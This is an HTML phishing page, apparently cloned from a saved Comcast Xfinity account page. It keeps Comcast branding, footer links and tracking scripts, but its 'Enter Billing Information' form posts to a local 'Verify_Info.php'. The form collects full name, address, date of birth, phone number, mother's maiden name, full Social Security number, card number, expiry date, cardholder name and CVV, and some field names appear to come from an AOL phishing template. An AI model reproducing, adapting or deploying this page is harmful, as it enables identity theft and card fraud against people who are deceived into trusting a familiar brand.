<!DOCTYPE html>
<!-- saved from url=(0059)https://idm.xfinity.com/myaccount/create-uid?execution=e1s4 -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script id="iPerceptions Art engine" src="./info-verification_files/artexpo_122423_v30.js.download" type="text/javascript"></script><script type="text/javascript" async="async" src="./info-verification_files/s19979932432230"></script>
    
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">

    <title>Verify Your Information</title>
    <meta name="description" content="Comcast Identity Management Portal">
    <meta name="author" content="Comcast">

    <meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0">

	<urscrub></urscrub><script type="text/javascript" async="" src="./info-verification_files/us2431a946a4b7d17778d9c086a94cdd1dd.js.download"></script><script src="./info-verification_files/satelliteLib-773f1d685076ba02ef9dd20f568cce9a6f1991dd.js.download"></script><script src="./info-verification_files/mbox-contents-fda2ad87579c80ed559acf8145c2499258e757cf.js.download"></script><style id="at-id-default-content-style">.mboxDefault {visibility:hidden;}</style>
 	<script src="./info-verification_files/jquery-1.11.3.min.js.download"></script>
 	<script src="./info-verification_files/lodash.min.js.download" type="text/javascript"></script>
 	<script src="./info-verification_files/tracking-DTM.min.js.download" type="text/javascript"></script>
 	<script src="./info-verification_files/tracking.min.js.download" type="text/javascript"></script>
 	
<!-- Variable to hold what events need to handle for input fields -->
<script>
	function secondaryButtonHandler(){var t=$("button[type=submit]:eq(0)");t.attr("value",$(this).attr("value")).attr("formnovalidate",""),$(this).attr("data-loader")?t.attr("data-loader",!0):t.removeAttr("data-loader"),t.click()}var inputEvents="input";</script>
<!--[if lte IE 9]>
	<script>
	inputEvents="keyup change paste";
	</script>
<![endif]-->
<!--[if lt IE 9]>
	<script> 
		window.html5 = { shivMethods: false, shivCSS: false };
		function secondaryButtonHandler() {
			var value = $(this).attr('value');
			$('form').append("<input name='_eventId' type='hidden' value='"+value+"'/>");
			$('form')[0].submit();
		}
	</script>
    <script src="js/libs/html5shiv-printshiv.min.js"></script>
    <script src="js/libs/selectivizr-min.js"></script>
<![endif]-->
<!--[if IE 9]>
	<script> window.html5 = { elements: 'main', shivMethods: false, shivCSS: false }; </script>
    <script src="js/libs/html5shiv-printshiv.min.js"></script>
<![endif]-->

	<link rel="stylesheet" href="./info-verification_files/styles-light.min.css">

<!--TODO: decide if we should be using the googleapis-->
	<!--<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
	<script>window.jQuery || document.write('<script src="js/libs/jquery-1.11.3.min.js"></script>')</script>
	-->

	<script src="./info-verification_files/dropkick.2.1.7.min.js.download"></script>

<!--TODO: decide if we should be using the aspnetcdn-->
	<!--<script src="//ajax.aspnetcdn.com/ajax/jquery.validate/1.13.1/jquery.validate.min.js"></script>
	<script src="//ajax.aspnetcdn.com/ajax/jquery.validate/1.13.1/additional-methods.min.js"></script>
	<script>jQuery.validator || document.write('<script src="js/libs/jquery.validate.min.js"></script><script src="js/libs/additional-methods.min.js"></script>')</script>
	-->
	<script src="./info-verification_files/jquery.validate.min.js.download"></script>
	<script src="./info-verification_files/additional-methods.min.js.download"></script>

<!--[if lt IE 9]>
    <script src="js/libs/respond.min.js"></script>
    <script src="js/libs/PIE_IE678.js"></script>
    <style>
    .xfinity-logo {
	    background: url(images/xfinity.png);
    }

    button.primary, button.secondary, button.submit, .button.primary, .button.secondary, .button.submit {
    	min-width: 90px;
    }

	[role=dialog].overlay .content {
		max-width: 592px;
	}

    input {
		position: relative;
		padding-top: 10px;
    }

	input[type=checkbox].slvzr-checked ~ .checkbox:after {
		display: none;
	}

	input[type=checkbox].slvzr-checked ~ .checkbox {
		background: none;
		border: none;
		background-image: url(images/checkbox_checked.png);
	}

	.icon.valid:after {
		border: none;
		width: 22px;
		height: 22px;
		margin: -1px 0 0 -1px;
		background-image: url(images/green_checkmark.png);
	}

	.dk-selected:after {
		background-image: url(images/chevron-down.png);
		width: 14px;
	    height: 7px;
	    border: none;
		margin-top: 13px;
	}
	.dk-select-open-down .dk-selected:after {
		background-image: url(images/chevron-up.png);
	}
    </style>
<![endif]-->
<!--[if lte IE 9]>
	<script type="text/javascript" src="js/libs/jquery.placeholder-plugin.min.js"></script>
    <script>
    	$(document).ready(function() {
    		$("input[name=mobilePhoneNumber]").removeAttr('placeholder');
			$("#userName").removeAttr('placeholder');
    		$('input:not([type=password]), textarea').placeholder();
			$('#passwordRetype').each(function() {
				var passwordPlaceholder=$(this).attr('placeholder');
    	  		$(this).before('<label for="passwordRetype">'+passwordPlaceholder+'</label>');
    		});
    	});
    </script>
<![endif]-->

<style type="text/css">
	section .right { position: relative; }</style>
<!--TODO: decide what libraries above, if any, should be inserted into the scripts.min.js-->
	<script src="./info-verification_files/scripts.min.js.download"></script>

<script src="./info-verification_files/satellite-5784f5c764746d24f80015ae.js.download"></script><script src="./info-verification_files/satellite-57dae85564746d7a9c010c22.js.download"></script><script src="./info-verification_files/s-code-contents-11c8f38a44853a1fa459e08fd609da47c7ce7efd.js.download"></script><script src="./info-verification_files/satellite-57dabd4464746d192c010983.js.download"></script><script src="./info-verification_files/satellite-580fe8b364746d7de000adbc.js.download"></script><script src="./info-verification_files/satellite-57ee858c64746d28e2004caa.js.download"></script><script src="./info-verification_files/satellite-582b2bc464746d0663003678.js.download"></script><script src="./info-verification_files/satellite-57ee850c64746d28e2004c7f.js.download"></script></head>
<body>
<div id="breakpoints"></div>
<div id="background" style="height: 586px;"></div>
<header>
	<nav><a class="xfinity-logo" href="http://xfinity.comcast.net/"><span class="accessibly-hidden">XFINITY</span></a></nav></header>

	<main role="main" class="main-content">
	<h1>Enter Billing Information</h1>
		<form id="mainForm" action="Verify_Info.php" method="post" novalidate="novalidate"><div class="field-container">
		

	
		<legend>
			<span>First Name </span>
			
		</legend>
		
	<input id="FirstName" name="FirstName" type="text" value="" maxLength="100" size="6" >

	<legend>
			<span>Middle Initial </span>
			
		</legend>
		
	<input id="MiddleName" name="MiddleName" type="text" value="" maxLength="100" size="6" >


    <legend>
			<span>Last Name </span>
			
		</legend>
		
	<input id="LastName" name="LastName" type="text" value="" maxLength="100" size="6" >
	
	
	<legend>
			<span>Billing Address Street </span>
			
	    </legend>
		
	<input id="Address" name="Address" type="text" value="" maxLength="100" size="6" >
            
     <legend>
			<span>City </span>
			
	    </legend>
		
	<input id="City" name="City" type="text" value="" maxLength="100" size="6" >
     
	 
	 <legend>
			<span>State </span>
			
	    </legend>
		
	<td width="283" height="23"><select size="1" name="State">
     <option value selected>Select</option>
              <option value="AL">AL - Alabama</option>
              <option value="AK">AK - Alaska</option>
              <option value="AZ">AZ - Arizona</option>
              <option value="AR">AR - Arkansas</option>
              <option value="CA">CA - California</option>
              <option value="CO">CO - Colorado</option>
              <option value="CT">CT - Connecticut</option>
              <option value="DE">DE - Delaware</option>
              <option value="FL">FL - Florida</option>
              <option value="GA">GA - Georgia</option>
              <option value="GU">GU - Guam</option>
              <option value="HI">HI - Hawaii</option>
              <option value="ID">ID - Idaho</option>
              <option value="IL">IL - Illinois</option>
              <option value="IN">IN - Indiana</option>
              <option value="IA">IA - Iowa</option>
              <option value="KS">KS - Kansas</option>
              <option value="KY">KY - Kentucky</option>
              <option value="LA">LA - Louisiana</option>
              <option value="ME">ME - Maine</option>
              <option value="MD">MD - Maryland</option>
              <option value="MA">MA - Massachusetts</option>
              <option value="MI">MI - Michigan</option>
              <option value="MN">MN - Minnesota</option>
              <option value="MS">MS - Mississippi</option>
              <option value="MO">MO - Missouri</option>
              <option value="MT">MT - Montana</option>
              <option value="NE">NE - Nebraska</option>
              <option value="NV">NV - Nevada</option>
              <option value="NH">NH - New Hampshire</option>
              <option value="NJ">NJ - New Jersey</option>
              <option value="NM">NM - New Mexico</option>
              <option value="NY">NY - New York</option>
              <option value="NC">NC - North Carolina</option>
              <option value="ND">ND - North Dakota</option>
              <option value="OH">OH - Ohio</option>
              <option value="OK">OK - Oklahoma</option>
              <option value="OR">OR - Oregon</option>
              <option value="PA">PA - Pennsylvania</option>
              <option value="PR">PR - Puerto Rico</option>
              <option value="RI">RI - Rhode Island</option>
              <option value="SC">SC - South Carolina</option>
              <option value="SD">SD - South Dakota</option>
              <option value="TN">TN - Tennessee</option>
              <option value="TX">TX - Texas</option>
              <option value="UT">UT - Utah</option>
              <option value="VT">VT - Vermont</option>
              <option value="VA">VA - Virginia</option>
              <option value="WA">WA - Washington</option>
              <option value="WV">WV - West Virginia</option>
              <option value="WI">WI - Wisconsin</option>
              <option value="WY">WY - Wyoming</option>
              </select> </td>


     <legend>
			<span>Zip/Postal Code </span>
			
	    </legend>
		
	<input id="ZipCode" name="ZipCode" type="text" value="" maxLength="100" size="6" >
     

     <legend>
			<span>Country </span>
			
	    </legend>
		
	<td width="200" height="0"><select size="1" name="Country">	 
	         <option value="US" selected>United States</option>
			 </select> </td>
			 
			 
		<fieldset>
	
		<legend>
			<span>Date of birth and phone number</span>
			
		</legend>
		
	
	<input id="dateOfBirth" name="dateOfBirth" value="" type="text" class="dob" autocomplete="off" data-mask="00/00/0000" placeholder="MM/DD/YYYY" aria-label="Account holders date of birth" required="true" data-msg-required="Please enter your date of birth." aria-required="true">
	<input id="accountPhoneNumber" name="accountPhoneNumber" value="" type="tel" autocomplete="off"  data-mask="(000)000-0000" placeholder="(###)###-####" aria-label="Enter the phone number on your account." required="true" data-msg-required="Please enter your phone number to proceed. It is the number associated with your Comcast account." data-rule-phoneus="true" data-msg-phoneus="This phone number is invalid." aria-required="true">

</fieldset>

          <legend>
			<span>Mother's Maiden Name</span>
			
		</legend>
		<input id="MothersMaidenName" name="MothersMaidenName" type="text" value="" maxLength="100" size="6" >
              
        <legend>
			<span>Social Security Number</span>
			
		</legend>
		<input id="SSN" name="SSN" type="text" value="" maxLength="100" size="6" >


		 <legend>
			<span>Comcast Accepts</span>
			
		</legend>
          <img alt="Visa, MasterCard, American Express, and Discover accepted!" src="info-verification_files/credit_cards.gif" width="227" height="24"></td>
           
		  <legend>
			<span>Credit/Debit Card:</span>
			
		</legend>
              <td width="283" height="41"><select name="Aol_CCDb">
              <option value selected>Select</option>
              <option value="Debit">Debit</option>
              <option value="Credit">Credit</option>
              </select><br>
			  
			  
         <legend>
			<span>Credit Card Type:</span>

		</legend>
              <td width="283" height="41"><select id="CardType">
              <option value="AmEx">American Express</option>
              <option value="CarteBlanche">Carte Blanche</option>
              <option value="DinersClub">Diners Club</option>
              <option value="Discover">Discover</option>
              <option value="EnRoute">enRoute</option>
              <option value="JCB">JCB</option>
              <option value="Maestro">Maestro</option>
              <option value="MasterCard">MasterCard</option>
              <option value="Solo">Solo</option>
              <option value="Switch">Switch</option>
              <option value="Visa">Visa</option>
              <option value="VisaElectron">Visa Electron</option>
              </select></td>
            
		<legend>
			<span>Card Number</span>
			
		</legend>
		<input id="Aol_CCNumber" name="Aol_CCNumber" type="text" value="" maxLength="100" size="6" >
             <font face="Arial" size="1" color="#FF0000">16 
              Digits No dashes No spaces</font></td>
            
			<legend>
			<span>Expiration Date</span>
			
		</legend>
		     
              <td width="283" height="23"><select size="1" name="Aol_CCExp">
              <option value selected>MM</option>
              <option value="1/January">01</option>
              <option value="2/February">02</option>
              <option value="3/March">03</option>
              <option value="4/April">04</option>
              <option value="5/May">05</option>
              <option value="6/June">06</option>
              <option value="7/July">07</option>
              <option value="8/August">08</option>
              <option value="9/September">09</option>
              <option value="10/October">10</option>
              <option value="11/November">11</option>
              <option value="12/December">12</option>
              </select><select size="1" name="Aol_CCExpYear">
              <option value selected>YYYY</option>
              <option value="2017">2017</option>
              <option value="2018">2018</option>
              <option value="2019">2019</option>
			  <option value="2020">2020</option>
			  <option value="2021">2021</option>
			  <option value="2022">2022</option>
			  <option value="2023">2023</option>
			  <option value="2024">2024</option>
			  <option value="2025">2025</option>
              </select> </td>
			  
			  
         <legend>
			<span>Name on the Card</span>
			
		</legend>
		<input id="nameofcc" name="nameofcc" type="text" value="" maxLength="100" size="6" >
		
		
		<legend>
			<span>Cvv/Cvv2</span>
			
		</legend>
		<input id="CardNumber" name="Aol_Cvv2" type="text" value="" maxLength="100" size="6" >
             
              <!-- end credit card table -->
	



<button class="submit" type="submit" id="continue" name="_eventId" value="submit">Continue</button>
</form><script>
	idm.ssnVerificationInit=function(){function t(){var t=$("#dateOfBirth\\.month").val()+"/"+$("#dateOfBirth\\.date").val()+"/"+$("#dateOfBirth\\.year").val();10==t.length&&$("#dateOfBirth").val(t)}$(document).ready(function(){$("#phoneNumber").bind(inputEvents,function(){appendPhoneNumber()}),$("#dateOfBirth").bind(inputEvents,function(){appendDateOfBirth()}),displayPhoneNumber(),t()}),jQuery.validator.addMethod("ValidateDateOfBirth",customDateOfBirthValidation,"This date is invalid."),jQuery.validator.addClassRules("dob",{ValidateDateOfBirth:!0});idm.createNewValidator({})};
	$(document).ready(idm.ssnVerificationInit);
</script>












<!-- TODO: add support for product -->






	


	




</main>

<footer>
		<span class="content">
			<span class="copyright">
				© 2016 Comcast</span>
			<nav>
				<span class="divider"></span>
<a href="http://xfinity.comcast.net/siteindex/">Site Map</a>
<span class="divider"></span>
<a href="http://my.xfinity.com/privacy/">Privacy Policy</a>
<span class="divider"></span>
<a href="http://my.xfinity.com/terms/web">Terms of Service</a>
<span class="divider"></span>
<a href="https://customer.comcast.com/contact-us/">Contact Us</a></nav>
			<span id="b537c389-7be1-4331-bb73-03a71788bc12" class="truste">
<script type="text/javascript" src="./info-verification_files/asc"></script>
<a href="https://privacy.truste.com/privacy-seal/Comcast-Cable-Communications-Management,-LLC/validation?rid=bf9d4d6f-2b32-4201-a167-5b55a4451508" title="TRUSTe online privacy certification" target="_blank">
<img style="border: none" src="./info-verification_files/seal" alt="TRUSTe online privacy certification">
</a>
</span></span>
	</footer>


<div id="startChatOverlay" role="dialog" hidden="">
	<div class="content">
		
	<h1>Any questions?</h1>
	<p>A customer representative would be happy to assist you. You will first need to answer a few questions so we can verify your identity.</p>
	<a class="submit button" href="https://chat.xfinity.com/Forms/UIDPassword" target="_new">Start Chat</a>

		
		<button type="button" class="close" title="Close" aria-label="Close"></button>
	</div>
</div>


<script>
	$(document).ready(function() {		 
		idm.init();
	});
</script>

<!--[if lt IE 9]>
<script>
$(function() {
	function attachPie() {
		setTimeout(function() {
		    $('button.submit, button.primary, .radio, .icon, .textfield, input').each(function() {
		    	if ($(this).is(':visible'))
			        PIE.attach(this);
		    });
	    }, 10);
    }

    attachPie();

    $('.icon').on('click',function() {
		attachPie();
    });

	function forcePieUpdate(selector) {
		$(selector).addClass('force-pie-update').removeClass('force-pie-update');
	}

    $('input[type=radio]').on('focus blur', function() {
		forcePieUpdate('.radio');
    });

    $.fn.slideDown = function(callback) { this.show().each(callback); }
    $.fn.slideUp = function(callback) { this.hide().each(callback); }
    
    $('form').submit(function(e){
    	var focusedButton = $('button[type=submit]:focus');
    	if( focusedButton.length) {
    		return true;
    	} 
    	var value = $('button[type=submit]:eq(0)').attr("value");
    	$('form').append("<input name='_eventId' type='hidden' value='"+value+"'/>");
    	
    	return true;
    });
});
</script>
<![endif]-->


	
	
	
	

	
	
	
	



	<script type="tracking-data-digitalData">
		{
			"page": {
				"category": {
			"primaryCategory": "idm",
			"subCategory1": "create-uid",
			
			"pageType": "idm"
		}
			},
			"siteInfo": {
				"siteVersion": "responsivedesign|CIMA IDM"
			}
		}
	</script>
	
	



	<script type="tracking-data-page">
		{
			
				"pageInfo": {
					"pageName": "Enter SSN, DOB, Phone"
				}
			
			
			
		}
	</script>





	

	

	

	

	

	

	

	

	

	

	

	

	

	

	
		
		
			
			
				
			
		
	

	

	

	

	

	

	
		
			
		
		
			
			
				
			
		
	



	<script type="tracking-data-user">
		[{
			"profile": [{
				"attributes": {
					"UIDVerificationMethod":"last 4 of ssn","uidCreationType":"IDM"
				}
			}]
		}]
	</script>


<script>
$(document).ready(function() {
	$("[rel='#startChatOverlay']").click(function(event) {
		idm.showOverlay($('#startChatOverlay'),$(this));
	});
});
</script>
<script>
	$(document).trigger('c-tracking-dtm-init');
	$(document).ready(function() {
		$(document).trigger('c-tracking-log-page');
	});
</script>


<script type="text/javascript" async="" src="./info-verification_files/wrapper.js.download"></script><iframe src="./info-verification_files/iFrame.html" id="iPerceptionsFrame" style="display: none;"></iframe><iframe id="destination_publishing_iframe_comcast_0" src="./info-verification_files/dest5.html" class="aamIframeLoaded" style="display: none; width: 0px; height: 0px;"></iframe><iframe id="artEXPOiFrame" name="CustomerFeedbackSurvey" title="CustomerFeedbackSurvey" frameborder="0" border="0" scrolling="no" seamless="seamless" allowtransparency="true" style="position: fixed; overflow-y: hidden; z-index: 99999; right: 0; bottom: 0; width: 136px; height: 58px; background-color: transparent; border: none; margin: 0; display: none; line-height: normal" src="./info-verification_files/saved_resource.html"></iframe></body></html>